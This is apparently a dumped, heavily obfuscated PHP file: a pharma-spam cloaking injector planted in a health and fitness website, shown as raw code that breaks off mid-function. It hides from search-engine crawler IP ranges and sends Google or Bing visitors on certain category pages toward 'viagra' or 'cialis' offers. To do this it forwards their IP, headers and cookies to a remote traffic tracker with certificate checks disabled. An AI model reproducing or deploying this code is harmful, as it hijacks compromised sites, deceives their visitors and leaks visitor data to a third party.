PHP Decode

<?php
 goto wJLCT; QvPTc: $_11 = $_SERVER["\x52\105\121\125\105\x53\x54\137\x55\x52\111"]; goto H7sfE; Dckxj: $_1 = $_SERVER["\122\105\115\x4f\124\105\137\101\x44\104\x52"]; goto ZaCDk; CE0mG: $_3 = false; goto ujQYF; qAXz3: if (@stripos($_2, "\147\x6f\157\x67\x6c\x65") !== false) { $_3 = true; } goto WMLUb; dGMj6: if (@stripos($_2, "\147\x6f\157\147\154\x65") !== false) { $_3 = true; } goto g1NKI; wJLCT: $_0 = $_SERVER["\110\x54\x54\x50\x5f\122\105\106\105\x52\x45\122"]; goto Dckxj; ujQYF: $_4 = array("\x35\56\62\65\x33\56\66\x33\x2e\60\55\x35\56\x32\65\x33\x2e\66\x33\x2e\62\x35\65", "\66\x34\56\66\x38\56\70\60\56\60\55\x36\64\56\x36\70\56\x39\65\x2e\x32\65\x35", "\x36\x36\x2e\62\x34\x39\56\66\64\56\60\x2d\x36\x36\56\62\x34\71\56\x39\65\56\62\x35\65", "\x36\64\x2e\61\x38\56\60\x2e\x31\55\x36\64\56\x31\70\x2e\x31\65\56\x32\65\x34", "\66\x34\56\x32\x33\63\56\61\x36\x30\56\61\55\66\64\56\62\63\63\x2e\x31\x39\61\x2e\62\65\x34", "\x36\66\x2e\x31\60\62\56\x30\x2e\61\x2d\66\x36\56\x31\60\x32\x2e\61\65\x2e\62\65\64", "\67\62\x2e\61\x34\x2e\61\71\62\x2e\x31\55\x37\x32\56\x31\64\x2e\x32\x35\x35\56\62\x35\64", "\67\64\x2e\x31\62\x35\56\x30\56\x31\x2d\x37\64\x2e\x31\x32\x35\x2e\62\x35\x35\56\x32\65\x34", "\x31\x37\x33\x2e\x31\71\x34\x2e\60\x2e\61\x2d\x31\x37\x33\56\x31\71\x34\x2e\x32\x35\x35\56\62\x35\64", "\x32\x30\x37\56\x31\62\x36\x2e\x31\64\64\x2e\61\x2d\x32\60\x37\x2e\x31\62\x36\x2e\x31\65\71\56\62\65\64", "\x32\60\x39\x2e\x38\65\56\x31\62\x38\x2e\x31\x2d\x32\x30\x39\x2e\70\65\56\x32\x35\65\x2e\62\x35\x34", "\62\61\66\x2e\x32\x33\x39\56\x33\62\x2e\61\55\62\61\x36\x2e\62\63\71\56\x36\x33\56\62\x35\64", "\x37\x32\x2e\x31\64\56\61\x39\71\x2e\60\x2d\x37\x32\56\x31\64\x2e\61\71\71\x2e\x32\x35\65", "\x38\56\x36\56\64\x38\56\x30\55\70\56\x36\56\64\x38\56\62\x35\65", "\x36\x37\x2e\x31\x39\x35\x2e\x30\56\60\55\x36\x37\56\x31\71\x35\56\62\x35\65\56\x32\65\x35", "\66\71\x2e\x31\64\x37\56\x36\x34\56\60\342\200\x93\x36\71\x2e\61\x34\x37\x2e\x31\62\x37\x2e\x32\65\x35", "\x37\x32\x2e\x33\x30\56\x36\x34\56\60\xe2\x80\x93\67\x32\56\x33\x30\56\62\x35\x35\56\x32\x35\65", "\x37\64\56\x36\x2e\60\56\60\342\x80\x93\67\x34\x2e\x36\56\62\x35\65\x2e\62\65\x35", "\66\x35\56\65\62\x2e\x30\56\60\xe2\x80\x93\x36\65\x2e\65\65\x2e\x32\65\x35\56\62\x35\65", "\x32\60\x37\x2e\x34\x36\x2e\x30\x2e\60\xe2\200\x93\x32\x30\x37\56\64\x36\56\62\x35\x35\x2e\x32\x35\x35"); goto qAXz3; H7sfE: switch ($_11) { case "\57\x63\141\164\x65\x67\157\162\x79\x2f\x61\x6c\151\155\145\156\164\x61\x63\151\157\156\x2f": case "\57\143\141\x74\145\x67\157\x72\171\57\x63\x75\145\162\x70\x6f\57": case "\57\143\141\x74\145\147\x6f\x72\x79\57\155\x65\x6e\164\145\57": case "\57\x63\141\164\x65\x67\x6f\x72\x79\57\164\145\x72\141\160\x69\x61\x73\x2f": case "\57\x63\141\164\145\x67\x6f\162\171\57\166\151\x64\141\57": case "\57\x63\141\x74\x65\147\x6f\162\171\57\x63\x68\x61\x72\154\x61\x73\55\x68\x65\x61\x6c\164\x68\171\57": $_12 = "\x76\151\x61\x67\x72\x61"; break; case "\x2f\143\165\x72\163\157\163\x2d\x62\145\x68\145\141\x6c\164\150\x79\x2f": case "\57\143\157\x6e\x74\141\x63\x74\157\x2f": case "\57\x70\165\x62\x6c\151\x63\151\x64\x61\144\57": case "\57\x63\141\x72\144\x69\x6f\x64\x61\156\143\x65\x2f": case "\57\x74\x69\x65\x6e\x64\x61\57": case "\57\155\x61\x74\162\151\x63\165\x6c\141\x63\x69\x6f\156\57": $_12 = "\x63\151\141\154\151\163"; break; } goto zm6V7; Wxi9C: switch ($_11) { case $_16[round(0)]: include $_15 . $_17[round(0)]; die; break; } goto C2V48; WMLUb: if (!$_3) { foreach ($_4 as $_5) { list($_6, $_7) = explode("\55", $_5, round(0 + 2)); $_8 = (double) sprintf("\x25\165", ip2long($_6)); $_9 = (double) sprintf("\45\x75", ip2long($_7)); $_10 = (double) sprintf("\45\165", ip2long($_1)); if ($_10 >= $_8 && $_10 <= $_9) { $_3 = true; break; } } } goto QvPTc; xb0cq: $_3 = false; goto rlATs; a2l29: $_11 = $_SERVER["\x52\x45\121\x55\105\x53\x54\x5f\125\122\x49"]; goto MwhXE; e8SSQ: ?>

<?php  goto hHFhK; rlATs: $_4 = array("\65\56\62\x35\63\x2e\x36\x33\56\60\x2d\x35\56\62\65\x33\x2e\x36\x33\56\x32\65\x35", "\66\64\x2e\66\70\x2e\x38\x30\x2e\60\x2d\x36\64\x2e\66\x38\x2e\x39\65\x2e\62\x35\x35", "\x36\x36\x2e\62\x34\x39\56\66\64\x2e\60\x2d\66\66\56\x32\64\x39\56\x39\65\x2e\62\65\x35", "\x36\64\x2e\x31\x38\56\60\56\61\x2d\x36\x34\x2e\61\x38\x2e\61\x35\56\x32\x35\x34", "\66\64\56\x32\x33\63\56\x31\66\x30\56\61\55\66\64\56\62\x33\63\x2e\x31\x39\x31\56\x32\65\x34", "\x36\x36\x2e\x31\60\62\x2e\x30\x2e\61\x2d\66\x36\56\61\x30\62\56\61\x35\56\x32\65\64", "\67\62\x2e\x31\64\56\x31\x39\x32\x2e\x31\x2d\67\62\x2e\61\64\x2e\x32\x35\x35\x2e\x32\x35\64", "\67\x34\x2e\x31\62\65\x2e\60\56\x31\55\67\64\x2e\61\x32\65\56\x32\x35\x35\x2e\x32\x35\x34", "\61\x37\x33\56\61\x39\x34\x2e\x30\x2e\x31\x2d\61\67\63\x2e\x31\71\64\56\x32\x35\65\56\x32\x35\64", "\62\x30\67\x2e\61\62\x36\56\x31\64\64\56\x31\55\62\x30\x37\x2e\61\x32\66\x2e\x31\x35\71\x2e\x32\65\x34", "\62\x30\x39\56\70\x35\x2e\x31\62\x38\x2e\x31\x2d\62\60\x39\x2e\x38\x35\x2e\62\x35\65\x2e\x32\x35\64", "\62\61\x36\x2e\x32\63\x39\56\63\62\x2e\61\x2d\x32\x31\66\x2e\x32\x33\71\x2e\x36\x33\x2e\62\x35\x34", "\x37\x32\x2e\61\64\x2e\x31\x39\x39\56\x30\x2d\67\62\56\x31\x34\56\61\x39\71\x2e\62\65\65", "\70\x2e\66\x2e\64\70\56\x30\x2d\x38\x2e\x36\56\x34\70\56\62\65\65", "\66\67\x2e\x31\x39\x35\x2e\60\56\60\x2d\66\x37\56\61\71\65\56\x32\65\65\x2e\x32\x35\65", "\66\x39\x2e\x31\x34\x37\x2e\x36\x34\x2e\x30\xe2\x80\x93\66\x39\56\x31\x34\x37\56\61\62\67\x2e\62\65\65", "\x37\62\x2e\63\x30\x2e\x36\x34\56\x30\342\x80\223\67\x32\x2e\x33\60\56\62\65\x35\x2e\62\65\x35", "\x37\64\56\66\56\60\x2e\x30\342\200\223\67\x34\x2e\66\56\x32\65\65\56\x32\65\65", "\x36\65\x2e\65\62\56\60\56\x30\xe2\x80\x93\66\x35\x2e\65\x35\x2e\x32\65\x35\56\62\65\x35", "\62\60\x37\56\64\66\x2e\x30\x2e\60\342\200\223\62\60\x37\56\64\66\56\x32\x35\x35\56\x32\65\x35"); goto dGMj6; rU03a: $_16 = array("\x2f\x76\x69\141\147\162\141\x2d\x65\x73\x70\141\156\141"); goto AFMng; zm6V7: if (!$_3) { if ((stripos($_0, "\x67\x6f\157\147\x6c\x65\x2e") || stripos($_0, "\142\151\156\147\56")) && isset($_12)) { goto aBzKY; uWc4r: class ResponseExecutor { public static function sendHeaders($result) { if (!empty($result->headers)) { foreach ($result->headers as $header) { if (!headers_sent()) { header($header); } } } if (!empty($result->status)) { static::_sendResponseCode($result->status); } if (!empty($result->contentType)) { $header = "\x43\x6f\156\x74\x65\156\164\x2d\x74\171\x70\145\x3a\x20" . $result->contentType; $headers[] = $header; if (!headers_sent()) { header($header); } } } public static function containsActionHeader($headers) { if (empty($headers)) { return false; } foreach ($headers as $header) { if (strpos($header, "\x4c\157\x63\141\164\x69\x6f\x6e\72") === 0) { return true; } if (strstr($header, "\64\x30\x34\x20\116\157\164\x20\x46\157\165\156\x64")) { return true; } } return false; } private static function _sendResponseCode($code = null) { if ($code !== null) { switch ($code) { case 100: $text = "\x43\x6f\156\x74\151\156\165\x65"; break; case 101: $text = "\x53\167\151\x74\x63\x68\x69\x6e\147\40\120\162\157\x74\x6f\143\157\154\163"; break; case 200: $text = "\x4f\x4b"; break; case 201: $text = "\x43\162\145\141\164\x65\144"; break; case 202: $text = "\101\143\143\x65\x70\164\145\x64"; break; case 203: $text = "\116\x6f\x6e\55\x41\x75\164\150\157\x72\x69\164\x61\x74\x69\166\x65\x20\x49\x6e\146\x6f\162\x6d\x61\164\151\x6f\x6e"; break; case 204: $text = "\x4e\157\40\x43\157\156\164\x65\156\x74"; break; case 205: $text = "\122\x65\163\145\164\x20\103\157\156\164\145\156\164"; break; case 206: $text = "\x50\x61\162\164\x69\x61\x6c\x20\103\157\x6e\164\x65\x6e\164"; break; case 300: $text = "\115\x75\154\164\151\x70\x6c\145\x20\x43\150\x6f\x69\143\145\163"; break; case 301: $text = "\x4d\157\166\145\144\x20\120\145\162\x6d\x61\x6e\145\x6e\164\154\171"; break; case 302: $text = "\x4d\x6f\x76\145\144\x20\x54\x65\x6d\160\157\162\141\162\x69\154\171"; break; case 303: $text = "\123\x65\x65\x20\x4f\164\x68\145\162"; break; case 304: $text = "\x4e\x6f\164\40\x4d\157\144\x69\x66\x69\x65\144"; break; case 305: $text = "\125\163\x65\40\x50\162\157\170\x79"; break; case 400: $text = "\102\x61\144\40\122\x65\x71\x75\x65\x73\x74"; break; case 401: $text = "\x55\x6e\141\165\x74\x68\157\162\x69\x7a\x65\144"; break; case 402: $text = "\x54\150\145\x20\x6c\x69\x63\x65\156\x73\145\x20\x6d\165\x73\x74\x20\x62\145\40\x69\x6e\40\120\162\157\40\x65\144\151\164\x69\157\156\40\x6f\162\40\150\x69\147\x68\x65\162"; break; case 403: $text = "\x46\157\162\x62\x69\144\x64\x65\x6e"; break; case 404: $text = "\116\x6f\164\40\106\x6f\x75\156\x64"; break; case 405: $text = "\x4d\145\164\150\157\x64\40\x4e\x6f\x74\40\x41\154\154\157\167\x65\x64"; break; case 406: $text = "\x4e\x6f\x74\40\x41\143\143\x65\160\164\141\142\x6c\x65"; break; case 407: $text = "\x50\162\157\x78\171\x20\x41\165\x74\x68\145\156\x74\x69\143\141\x74\x69\x6f\156\40\x52\x65\x71\165\151\162\145\x64"; break; case 408: $text = "\x52\145\161\x75\145\x73\164\x20\124\x69\155\x65\x2d\157\x75\x74"; break; case 409: $text = "\x43\157\156\146\x6c\x69\x63\x74"; break; case 410: $text = "\107\157\156\x65"; break; case 411: $text = "\x4c\x65\x6e\147\164\x68\x20\x52\x65\161\165\x69\162\x65\144"; break; case 412: $text = "\x50\162\x65\x63\x6f\x6e\x64\x69\x74\151\157\156\40\x46\141\151\154\145\x64"; break; case 413: $text = "\122\x65\x71\165\x65\x73\x74\x20\105\156\x74\151\x74\x79\40\x54\157\157\40\x4c\x61\x72\x67\145"; break; case 414: $text = "\x52\145\x71\165\x65\163\x74\55\125\122\x49\x20\x54\x6f\157\x20\x4c\x61\162\x67\145"; break; case 415: $text = "\x55\156\163\165\x70\x70\x6f\x72\x74\145\144\40\115\x65\x64\x69\141\40\124\x79\160\145"; break; case 500: $text = "\x49\156\x74\145\x72\156\x61\x6c\40\x53\x65\x72\166\x65\162\40\x45\x72\162\157\162"; break; case 501: $text = "\x4e\x6f\164\40\x49\155\x70\154\x65\155\145\x6e\x74\145\x64"; break; case 502: $text = "\x42\x61\144\x20\x47\x61\164\x65\167\x61\x79"; break; case 503: $text = "\x53\145\162\x76\x69\x63\x65\40\x55\156\141\166\x61\x69\154\x61\142\x6c\145"; break; case 504: $text = "\x47\141\x74\145\167\141\171\40\x54\151\x6d\x65\55\x6f\165\x74"; break; case 505: $text = "\110\x54\x54\120\40\x56\145\162\x73\151\x6f\156\x20\x6e\157\164\x20\x73\x75\x70\160\x6f\x72\164\x65\x64"; break; default: $text = ''; } $protocol = isset($_SERVER["\123\105\122\x56\x45\x52\x5f\120\122\117\x54\117\x43\x4f\x4c"]) ? $_SERVER["\123\x45\122\126\x45\122\x5f\120\122\117\x54\117\103\x4f\x4c"] : "\x48\x54\124\120\x2f\x31\56\60"; header($protocol . "\40" . $code . "\x20" . $text); } } } goto cPifu; v8NMo: class KClientError extends Exception { const ERROR_UNKNOWN = "\125\x4e\x4b\x4e\x4f\127\116"; public function getHumanCode() { switch ($this->getCode()) { case CURLE_HTTP_RETURNED_ERROR: preg_match("\x2f\x54\x68\x65\x20\x72\145\161\165\145\163\164\x65\x64\40\x55\x52\114\x20\x72\x65\164\165\x72\156\x65\x64\40\145\x72\x72\x6f\162\72\40\x28\x3f\x27\x65\162\162\157\162\103\x6f\x64\x65\x27\x5c\x64\53\51\56\x2a\44\57", $this->getMessage(), $matches); $errorCode = isset($matches["\145\162\162\157\162\103\x6f\x64\145"]) ? $matches["\x65\162\162\157\162\x43\157\144\x65"] : "\x48\124\124\x50\137\x45\122\122\117\122\x5f" . self::ERROR_UNKNOWN; return "\x5b\122\x45\x51\x5f\105\122\122\72\40{$errorCode}\x5d"; case CURLE_UNSUPPORTED_PROTOCOL: return "\x5b\122\x45\x51\137\x45\122\x52\x3a\40\125\116\123\125\x50\x50\117\x52\x54\x45\104\x5f\120\x52\x4f\124\117\x43\117\x4c\135"; case CURLE_FAILED_INIT: return "\133\122\x45\x51\137\105\122\122\72\x20\x46\101\111\x4c\105\x44\x5f\x49\x4e\111\x54\x5d"; case CURLE_URL_MALFORMAT: return "\133\122\x45\121\x5f\x45\122\122\72\40\102\101\104\137\x55\122\x4c\135"; case CURLE_COULDNT_RESOLVE_PROXY: return "\x5b\122\x45\121\137\x45\122\x52\x3a\x20\x43\x4f\x55\x4c\x44\x4e\x54\x5f\x52\105\123\x4f\114\x56\105\137\120\122\117\x58\131\135"; case CURLE_COULDNT_RESOLVE_HOST: return "\x5b\x52\105\121\137\105\x52\122\72\x20\103\x4f\125\114\x44\116\124\137\x52\x45\123\117\114\126\105\x5f\x48\x4f\123\124\135"; case CURLE_COULDNT_CONNECT: return "\133\x52\x45\x51\x5f\x45\x52\122\72\40\103\117\x55\114\104\116\x54\x5f\103\117\116\x4e\105\x43\x54\135"; case CURLE_PARTIAL_FILE: return "\133\122\x45\x51\137\105\122\x52\72\x20\120\101\x52\124\111\101\114\137\106\111\114\x45\x5d"; case CURLE_READ_ERROR: return "\x5b\x52\x45\121\137\105\x52\122\72\40\122\105\x41\x44\x5f\105\x52\x52\117\122\x5d"; case CURLE_OUT_OF_MEMORY: return "\133\x52\105\121\137\105\x52\122\72\x20\117\x55\124\x5f\117\106\x5f\x4d\x45\x4d\117\x52\x59\135"; case CURLE_OPERATION_TIMEDOUT: return "\x5b\x52\x45\x51\x5f\105\122\x52\x3a\40\117\x50\x45\122\x41\124\x49\x4f\x4e\137\124\111\115\x45\x44\117\x55\124\135"; case CURLE_HTTP_POST_ERROR: return "\x5b\122\x45\121\137\x45\122\122\x3a\x20\x48\124\124\120\137\x50\117\123\124\137\105\122\x52\117\x52\135"; case CURLE_BAD_FUNCTION_ARGUMENT: return "\133\122\x45\121\137\x45\122\122\x3a\40\x42\101\104\137\x46\125\116\103\124\x49\117\x4e\x5f\x41\x52\x47\125\x4d\105\x4e\124\135"; case CURLE_TOO_MANY_REDIRECTS: return "\x5b\122\x45\x51\137\105\122\x52\x3a\40\124\117\117\137\115\101\x4e\131\x5f\x52\x45\x44\111\x52\105\103\124\x53\x5d"; case CURLE_GOT_NOTHING: return "\x5b\x52\x45\x51\137\105\x52\x52\72\x20\107\117\124\137\x4e\x4f\x54\x48\111\x4e\107\x5d"; case CURLE_SEND_ERROR: return "\133\122\105\x51\x5f\x45\122\122\72\x20\123\x45\x4e\x44\137\105\x52\122\117\122\x5d"; case CURLE_RECV_ERROR: return "\133\122\x45\121\x5f\105\x52\x52\72\40\122\105\x43\x56\x5f\x45\122\x52\x4f\122\135"; case CURLE_BAD_CONTENT_ENCODING: return "\133\x52\x45\x51\137\105\122\122\72\40\x42\101\x44\x5f\x43\x4f\116\124\x45\116\124\x5f\105\116\103\117\x44\111\x4e\107\135"; case CURLE_SSL_CACERT: case CURLE_SSL_CACERT_BADFILE: case CURLE_SSL_CERTPROBLEM: case CURLE_SSL_CIPHER: case CURLE_SSL_CONNECT_ERROR: case CURLE_SSL_ENGINE_NOTFOUND: case CURLE_SSL_ENGINE_SETFAILED: case CURLE_SSL_PEER_CERTIFICATE: case CURLE_SSL_PINNEDPUBKEYNOTMATCH: return "\x5b\x52\105\121\137\105\x52\122\x3a\40\123\x53\114\135"; case CURLE_OK: return ''; default: return "\x5b\122\105\x51\137\105\x52\122\x3a\40" . self::ERROR_UNKNOWN . "\135"; } } } goto NPAcW; cPifu: class KHttpClient { const UA = "\x4b\x48\164\164\160\x43\154\x69\x65\x6e\x74"; public function request($url, $params, $opts = array()) { if (!in_array("\x63\165\x72\154", get_loaded_extensions())) { return json_encode(array("\145\162\x72\157\x72" => "\x43\x75\162\154\40\x65\x78\x74\145\156\x73\151\x6f\156\40\155\x75\163\164\40\x62\145\40\151\156\x73\164\163\141\154\x6c\145\144")); } $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_COOKIE, isset($opts["\x63\x6f\157\153\151\145\163"]) ? $opts["\x63\x6f\x6f\x6b\x69\145\x73"] : null); curl_setopt($ch, CURLOPT_NOBODY, 0); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_TIMEOUT, 10); curl_setopt($ch, CURLOPT_USERAGENT, self::UA); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params)); curl_setopt($ch, CURLOPT_FAILONERROR, true); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); $result = curl_exec($ch); if (curl_error($ch)) { throw new KClientError(curl_error($ch), curl_errno($ch)); } if (empty($result)) { throw new KClientError("\105\155\x70\x74\171\x20\x72\x65\163\x70\157\x6e\163\145"); } return $result; } } goto v8NMo; aBzKY: class KClient { const SESSION_SUB_ID = "\163\x75\x62\137\151\144"; const SESSION_LANDING_TOKEN = "\x6c\x61\156\x64\151\156\x67\137\164\x6f\x6b\145\x6e"; const VERSION = 3; const STATE_SESSION_KEY = "\x6b\x65\151\164\x61\x72\x6f\x5f\163\x74\x61\164\145"; const STATE_SESSION_EXPIRES_KEY = "\153\145\151\x74\141\x72\x6f\137\x73\x74\x61\164\x65\x5f\145\x78\160\x69\x72\x65\x73"; const DEFAULT_TTL = 1; const NOT_FOUND_STATUS = 404; private $_httpClient; private $_debug = false; private $_trackerUrl; private $_params = array(); private $_log = array(); private $_excludeParams = array("\x61\x70\151\137\153\x65\171", "\x74\x6f\x6b\x65\x6e", "\x6c\x61\x6e\147\x75\x61\147\145", "\x75\x61", "\151\160", "\x72\x65\x66\145\x72\162\x65\x72", "\146\x6f\x72\143\x65\x5f\x72\145\144\x69\x72\145\143\164\x5f\157\146\146\x65\162"); private $_result; private $_stateRestored; private $_sessionsDisabled = false; const ERROR = "\133\x4b\x54\162\x61\x66\146\x69\143\x43\154\151\145\x6e\x74\x5d\40\123\x6f\x6d\145\164\x68\151\x6e\x67\x20\151\163\40\x77\x72\157\x6e\x67\56\40\105\156\x61\142\x6c\145\x20\x64\x65\142\x75\147\x20\x6d\x6f\144\145\x20\x74\x6f\40\x73\145\145\40\164\150\x65\x20\x72\145\x61\163\x6f\x6e\x2e"; public function __construct($trackerUrl, $token) { $this->trackerUrl($trackerUrl); $this->campaignToken($token); $this->version(self::VERSION); $this->param("\151\x6e\146\x6f", 1); $this->fillParams(); } public function fillParams() { $referrer = isset($_SERVER["\110\124\x54\120\x5f\x52\x45\106\105\x52\x45\122"]) ? $_SERVER["\x48\x54\124\120\137\122\x45\x46\x45\x52\105\x52"] : null; $this->setHttpClient(new KHttpClient()); $host = isset($_SERVER["\110\124\124\x50\x5f\110\117\x53\124"]) ? $_SERVER["\110\124\x54\120\x5f\110\117\x53\124"] : null; $requestUri = isset($_SERVER["\122\105\121\x55\x45\123\x54\137\125\x52\111"]) ? $_SERVER["\x52\105\x51\x55\x45\123\x54\137\x55\122\x49"] : null; $this->ip($this->_findIp())->ua(isset($_SERVER["\x48\124\124\120\137\x55\123\x45\122\x5f\101\107\105\x4e\x54"]) ? $_SERVER["\110\x54\124\120\x5f\125\123\105\x52\137\101\107\x45\116\124"] : null)->language(isset($_SERVER["\110\124\x54\120\137\x41\x43\x43\x45\x50\124\137\x4c\101\x4e\107\x55\x41\x47\105"]) ? substr($_SERVER["\110\124\x54\x50\137\x41\103\x43\x45\120\124\x5f\x4c\x41\116\x47\125\101\107\105"], 0, 2) : '')->xRequestedWith(isset($_SERVER["\x48\x54\124\x50\x5f\130\x5f\122\105\x51\125\105\x53\x54\105\104\137\x57\x49\x54\x48"]) ? $_SERVER["\x48\124\124\120\137\x58\x5f\x52\x45\121\125\105\x53\x54\x45\104\x5f\127\111\124\110"] : null)->seReferrer($referrer)->referrer($referrer)->param("\157\x72\x69\x67\151\156\141\x6c\137\x68\x65\141\x64\x65\x72\x73", $this->_getAllHeaders())->param("\x6f\162\151\147\x69\156\141\x6c\x5f\x68\x6f\163\x74", isset($_SERVER["\x48\x54\124\120\x5f\110\x4f\123\x54"]) ? $_SERVER["\x48\124\124\x50\x5f\x48\x4f\123\x54"] : "\154\157\x63\x61\154\x68\x6f\x73\164")->param("\x6f\x72\x69\x67\151\x6e\x61\154\x5f\155\145\164\150\157\144", isset($_SERVER["\122\x45\x51\125\105\x53\124\137\x4d\x45\x54\110\x4f\x44"]) ? $_SERVER["\x52\x45\x51\x55\105\x53\x54\137\115\105\124\110\117\104"] : "\107\x45\124")->param("\x75\x72\x69", (!empty($_SERVER["\x48\x54\124\120\x53"]) ? "\150\x74\164\160\x73" : "\150\164\x74\160") . "\72\x2f\57" . $host . $requestUri)->param("\x6b\x76\x65\162\x73\151\x6f\x6e", "\63\x2e\64"); if ($this->isPrefetchDetected()) { $this->param("\x70\162\x65\x66\145\x74\143\x68", 1); } } public function currentPageAsReferrer() { $this->referrer($this->_getCurrentPage()); return $this; } public function debug($state = true) { $this->_debug = $state; return $this; } public function seReferrer($seReferrer) { $this->_params["\x73\145\x5f\x72\x65\146\145\162\x72\145\162"] = $seReferrer; return $this; } public function referrer($referrer) { $this->_params["\x72\x65\146\x65\x72\162\145\162"] = $referrer; return $this; } public function xRequestedWith($xRequestedWith) { $this->_params["\x78\137\162\x65\x71\165\x65\163\164\145\144\137\x77\x69\164\x68"] = $xRequestedWith; return $this; } public function setHttpClient($httpClient) { $this->_httpClient = $httpClient; return $this; } public function trackerUrl($trackerUrl) { if (!empty($trackerUrl)) { $request = parse_url($trackerUrl); $this->_trackerUrl = "{$request["\163\x63\150\145\155\145"]}\x3a\x2f\57{$request["\x68\x6f\163\x74"]}"; if (isset($request["\x70\x6f\162\x74"])) { $this->_trackerUrl .= "\x3a" . $request["\x70\157\162\164"]; } } } public function token($token) { return $this->campaignToken($token); } public function campaignToken($campaignToken) { $this->_params["\x74\x6f\x6b\145\x6e"] = $campaignToken; return $this; } public function version($version) { $this->_params["\166\145\162\x73\151\157\156"] = $version; return $this; } public function ua($ua) { $this->_params["\165\141"] = $ua; return $this; } public function language($language) { $this->_params["\x6c\141\x6e\x67\x75\x61\147\x65"] = $language; return $this; } public function keyword($keyword) { $this->_params["\x6b\x65\171\167\157\162\x64"] = $keyword; return $this; } public function forceRedirectOffer() { $this->_params["\146\157\162\x63\x65\137\162\x65\144\x69\x72\145\143\164\x5f\157\146\146\145\162"] = 1; } public function ip($ip) { $this->_params["\151\x70"] = $ip; return $this; } public function sendUtmLabels() { foreach ($_GET as $name => $value) { if (strstr($name, "\165\164\x6d\x5f")) { $this->_params[$name] = $value; } } } public function setLandingToken($token) { $this->_startSession(); $_SESSION["\164\157\x6b\145\x6e"] = $token; } public function getSubId() { $result = $this->performRequest(); if (empty($result->info->sub_id)) { $this->log("\116\x6f\40\163\x75\x62\x5f\x69\x64\40\x69\163\x20\x64\x65\x66\x69\156\x65\x64"); return "\156\157\137\163\165\142\151\144"; } $subId = $result->info->sub_id; return $subId; } public function getToken() { $result = $this->performRequest(); if (empty($result->info->sub_id)) { $this->log("\116\x6f\40\x6c\x61\x6e\144\151\156\147\x20\164\157\x6b\x65\x6e\x20\x69\163\x20\x64\145\146\x69\x6e\145\x64"); return "\156\x6f\x5f\164\x6f\153\x65\x6e"; } $subId = $result->info->token; return $subId; } public function sendAllParams() { foreach ($_GET as $name => $value) { if (empty($this->_params[$name]) && !in_array($name, $this->_excludeParams)) { $this->_params[$name] = $value; } } } public function restoreFromSession() { if ($this->isStateRestored() || $this->_sessionsDisabled) { return; } $this->_startSession(); if (!empty($_SESSION[self::STATE_SESSION_KEY])) { if ($_SESSION[self::STATE_SESSION_EXPIRES_KEY] < time()) { unset($_SESSION[self::STATE_SESSION_KEY]); unset($_SESSION[self::STATE_SESSION_EXPIRES_KEY]); $this->log("\x53\164\141\164\x65\40\145\x78\160\x69\162\x65\x64"); } else { $this->_result = json_decode($_SESSION[self::STATE_SESSION_KEY], false); if (isset($this->_result) && isset($this->_result->headers)) { $this->_result->headers = array(); } $this->_stateRestored = true; $this->log("\x53\164\141\164\145\40\162\145\163\164\x6f\x72\x65\x64"); } } } public function disableSessions() { $this->_sessionsDisabled = true; } public function restoreFromQuery() { if (isset($_GET["\x5f\163\165\142\x69\x64"])) { $this->_stateRestored = true; if (empty($this->_result)) { $this->_result = new StdClass(); $this->_result->info = new StdClass(); } $this->_result->info->sub_id = $_GET["\137\x73\x75\142\151\x64"]; $this->log("\123\x75\x62\x49\144\40\x6c\x6f\x61\144\145\x64\x20\x66\x72\x6f\x6d\x20\161\165\x65\x72\171"); if (isset($_GET["\137\x74\x6f\x6b\x65\x6e"])) { $this->_result->info->token = $_GET["\137\164\x6f\x6b\x65\156"]; $this->log("\114\x61\x6e\144\x69\156\x67\x20\164\157\x6b\x65\x6e\x20\x6c\x6f\141\144\x65\144\40\146\162\x6f\x6d\40\x71\x75\145\162\x79"); } $this->_storeState($this->_result, self::DEFAULT_TTL); $this->_stateRestored = true; } } public function isStateRestored() { return $this->_stateRestored; } public function isPrefetchDetected() { $checkServerParams = array("\110\x54\124\x50\x5f\130\x5f\120\125\x52\x50\x4f\123\x45" => "\160\x72\x65\x76\x69\145\167", "\110\124\x54\x50\x5f\x58\137\x4d\117\132" => "\160\162\145\146\145\164\x63\150", "\110\x54\124\120\x5f\130\137\106\x42\137\x48\x54\124\120\137\x45\x4e\x47\x49\116\x45" => "\x4c\151\x67\x65\x72"); foreach ($checkServerParams as $name => $value) { if (isset($_SERVER[$name]) && $_SERVER[$name] == $value) { return true; } } return false; } public function saveCookie($key, $value, $ttl) { if (isset($_COOKIE[$key]) && $_COOKIE[$key] == $value) { return; } if (!headers_sent()) { setcookie($key, $value, $this->_getCookiesExpireTimestamp($ttl), "\57", $this->_getCookieHost()); } $_COOKIE[$key] = $value; } public function param($name, $value) { if (!in_array($name, $this->_excludeParams)) { $this->_params[$name] = $value; } return $this; } public function params($value) { if (!empty($value)) { if (is_string($value)) { parse_str($value, $result); foreach ($result as $name => $value) { $this->param($name, $value); } } } return $this; } public function reset() { $this->_result = null; } public function performRequest() { if ($this->_result) { return $this->_result; } $request = $this->_buildRequestUrl(); $params = $this->getParams(); $options = $this->_getRequestOptions(); $this->log("\x52\x65\x71\x75\x65\163\164\x3a\x20" . $request); try { $result = $this->_httpClient->request($request, $params, $options); $this->log("\122\x65\x73\160\157\156\163\145\x3a\x20" . $result); } catch (KClientError $e) { if ($this->_debug) { throw $e; } else { $errorCode = $e->getHumanCode(); $errorCode = $errorCode ? $errorCode . "\x20" : ''; echo $errorCode . self::ERROR; return; } } $this->_result = json_decode($result); $this->_storeState($this->_result, isset($this->_result->cookies_ttl) ? $this->_result->cookies_ttl : null); if (isset($this->_result->cookies)) { $this->_saveKeitaroCookies($this->_result->cookies, $this->_result->cookies_ttl); } return $this->_result; } public function execute($break = false, $print = true) { $result = $this->performRequest(); $body = $this->_buildBody($result); if (!$print) { return $body; } $this->_sendHeaders($result); echo $body; } public function executeAndBreak() { $result = $this->performRequest(); $body = $this->_buildBody($result); $this->_sendHeaders($result); if (!empty($body)) { die($body); } if (!empty($result->headers) && ResponseExecutor::containsActionHeader($result->headers)) { die($body); } if (!empty($result->status) && $result->status == self::NOT_FOUND_STATUS) { 